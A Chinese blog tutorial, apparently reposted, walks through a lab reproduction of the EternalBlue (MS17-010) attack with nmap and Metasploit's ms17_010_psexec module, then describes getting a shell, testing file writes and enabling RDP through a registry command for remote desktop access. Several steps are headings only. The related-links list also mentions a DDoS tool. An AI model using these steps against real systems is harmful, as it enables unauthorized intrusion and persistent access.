python调用msfconsole全自动永恒之蓝攻击_永恒之蓝漏洞攻击完整步骤
需要设备:
kali攻击机
windows2003/windows2008被攻击机 ip:192.168.15.129
1.进行端口扫描
nmap -Pn -sV -T4 ip地址
明白445端口和3389端口open,3389关闭现在无所谓,如果开启以后拿到权限以后就不用做开启3389端口的操作
2.漏洞脚本检测
nmap --script=vuln 192.168.15.129(ip地址)
看出ms17-010漏洞可以攻击
3.msfconsole测试
msfconsole
4.查找合适的测试漏洞的模块
search ms17-010
5.使用模块进行测试
Use 模块
use exploit/windows/smb/ms17_010_psexec
6.查看攻击模块
7.添加被攻击机ip
8.开始进行测试
这样这是攻击成功.
9.查看拿到的权限
meterpreter > ls
10.进入shell,就可以在被攻击机里进行一系列操作
写入文件,查看能否写入
echo “hi” > C:/1.txt
11.添加用户并把用户加入到管理员组(提权)
备注:如果3389端口开的情况,进行下一步,如果3389端口关闭,进行此命令开启3389端口
开启3389 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
关闭3389 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f
12.开启完3389端口以后,就可以进行远程桌面连接
主机进行远程连接
Win+R:mstsc
输入服务器ip,用户名(刚才创建的用户名)
完整的步骤就完成了,成功拿到了所有的权限
文章来源: blog.csdn.net,作者:小郭学安全,版权归原作者所有,如需转载,请联系作者。
原文链接:blog.csdn.net/G_Fu_Q/article/details/109548277
python调用msfconsole全自动永恒之蓝攻击_永恒之蓝漏洞攻击完整步骤相关推荐
- python调用msfconsole全自动永恒之蓝攻击_使用Metasploit复现永恒之蓝攻击
1.Metaspolit介绍 Metasploit是一个免费的.可下载的框架,通过它可以很容易地获取.开发并对计算机软件漏洞实施攻击.它本身附带数百个已知软件漏洞的专业级漏洞攻击工具,并保持着频繁更新 ...
- python调用msfconsole全自动永恒之蓝攻击_永恒之蓝-ETERNALBLUE漏洞MS17-010利用过程
本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担 事情起因 虽然距离上一次WannaCry席卷全球(17-05-12)已经过去一年多了,现在来复现有炒冷饭的嫌疑,但是还是有价值的 ...
- python ddos攻击_使用Torshammer执行DDoS攻击
用的方法很少,声称DDoS或任何类型的网络丢失都是成功的.让我们看一下执行DDoS攻击的方法之一.这种攻击非常强大,并且需要您应该知道如何在Kali Linux操作系统上操作命令的唯一技能. 首先,如 ...
- 哈希扩展长度攻击_哈希长度扩展攻击
哈希扩展长度攻击 在这篇文章中,我将尽力避免夏季的低迷,而将重点放在比抱怨天气更有趣的事情上-哈希长度扩展攻击. 散列长度扩展攻击并不复杂也不复杂,说实话,这只是关于如何使用散列函数. 正如我以前的一 ...
- oc引导windows蓝屏_跟电脑蓝屏say no!【亲测有效】
01专业解释 电脑蓝屏,又叫蓝屏死机(Blue Screen of Death,简称BSOD),是微软的 Windows 系列操作系统在无法从一个系统错误中恢复过来时,为保护电脑数据文件不被破坏而 ...
- python调用自定义函数返回值的类型_生成dll文件以及python对DLL中函数的调用(参数类型以及返回值)...
工具:VS2010 python2.7 (若使用的python是64位的,生成的dll也要使用x64) 系统:win7pro 64bit 首先,dll工程的创建以及dll文件的生成: new p ...
- python调用matlab环境配置、非常详细!!!_[python][matlab]使用python调用matlab程序
问题引入 在做实验的时候,需要用到python和matlab工具来进行不同的处理,比如在run神经网络的时候,需要使用pytorch框架得到网络的各个参数,在得到参数后需要使用matlab进行聚类规划 ...
- python 调用不存在的方法 统一处理_提取不重复数据在Excel、SQL与Python中的处理方法...
村长今天跟大家简单分享一下如何在Excel.SQL和Python中用不同的方法提取不重复值(数据去重). 一.Excel 1.1.函数法(数组公式) 函数公式:=IFERROR(INDEX(A:A,S ...
- python实现cc攻击_网站如何防CC攻击–巧用nginx
最近跟大佬练习网站攻防.本来做好了防ddos的准备,没想到大佬花了几分钟就写了个node.js的脚本,直接对我的服务器发起了cc攻击,瞬间服务器cpu跑满,2秒即502.在感叹大佬的技术之外,我也顺便 ...
最新文章
- AI在管理临床试验设计和执行中,人和机器还在学习曲线上?
- powerdesigner箭头如何画_用Scratch编程画几何图形:如何画多边形
- Java的知识点32——Mysql的简单使用
- c语言平滑raw图像(取平均值法)
- react取消捕获_React 面试指南 (上)
- 1251: 字母图形 [水题]
- 如何在 ASP.Net Core 中使用 条件中间件
- cefsharp49显示html,CefSharp-cefshar
- Redis:23---info命令总结
- ubuntu下安装chrome浏览器和flash插件
- 软件关闭excel但是进程中还存在原因_从软件视角看波音737事故系列述评之一:软件普适化下的能力建设...
- Win11系统中的Thumbs.db文件可以删除吗?
- 提交数据网页设计_数据化时代,爬虫工程师才是真正“扛把子”
- 烽火FSU设备通过中国铁塔测试
- Scaling Your Node.js Apps 免积分下载
- vue 默认加载某一子路由
- ubuntu:下载ubuntu内核
- JAVA操作ES中的BoolQueryBuilder 查询方法
- 通信原理 | 基本概念
- 现代黄河三角洲的冲淤分区及地层特征